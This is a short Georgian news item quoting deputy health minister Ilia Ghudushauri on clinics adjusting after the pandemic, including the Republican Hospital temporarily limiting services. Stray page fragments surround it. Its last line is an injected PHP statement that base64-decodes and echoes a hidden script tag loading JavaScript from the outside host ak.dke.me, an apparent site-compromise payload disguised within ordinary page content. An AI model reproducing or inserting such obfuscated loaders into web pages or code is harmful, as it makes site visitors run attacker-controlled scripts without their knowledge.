celsiusi
ავერსი შნაიდერი
„ჩვენთვის საკმაოდ გაუგებარია კლინიკების პრეტენზიები. ვიცით, რომ პანდემიური რეჟიმი იყო და დატვირთულობაც შესაბამისი, თუმცა ამ  პერიოდის განმავლობაში ისინი მზად უნდა ყოფილიყვნენ და უნდა ეფიქრათ, რომ პანდემია დასრულდებოდა და მათ მოუწევდათ გადაწყობა. ეს ჩვეულებრივი ბიზნეს პროცესია, ერთი სერვისი იხურება და სხვა სერვისის მიმართულებით უნდა გადავიდნენ“, - ამის შესახებ, ჯანდაცვის მინისტრის მოადგილემ ტელეკომპანია „იმედის“ ეთერში განაცხადა. 
 
ილია ღუდუშაურმა აღნიშნა, რომ ახალ რეჟიმზე გადაწყობა რესპუბლიკურ საავადმყოფოშიც მიმდინარეობს, რის გამოც კლინიკა პაციენტთა მომსახურებას დროებით შეზღუდავს.
 
„აქვე მინდა აღვნიშნო, რომ იგივე პრობლემები, ფინანსურ ნაწილში დანახარჯები გადაწყობასთან დაკავშირებით სახელმწიფო კლინიკებშიც არის. მაგალითად რესპუბლიკური საავადმყოფო, რომელიც ყველაზე დიდი სახელმწიფო კლინიკაა, გადადის იმ რეჟიმში, რომ დროებით  შეიზღუდება,  სამედიცინო სერვისის მიწოდება, რადგან კლინიკა გადავიდეს ჰიბრიდულ რეჟიმზე. რა თქმა უნდა ეს დანახარჯებთან არის დაკავშირებული. ეს არის ჩვეულებრივი სამუშაო პროცესი, რომელიც როგორც სახელმწიფო, ასევე კერძო კლინიკებმა უნდა გასწიონ იმისთვის, რომ შემდეგ შეძლონ ახალი და ხარისხიანი სევრისების მიწოდება პაციენტებისთვის“, - განაცხადა ჯანდაცვის მინისტრის მოადგილე ილია ღუდუშაურმა. 
 
959
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");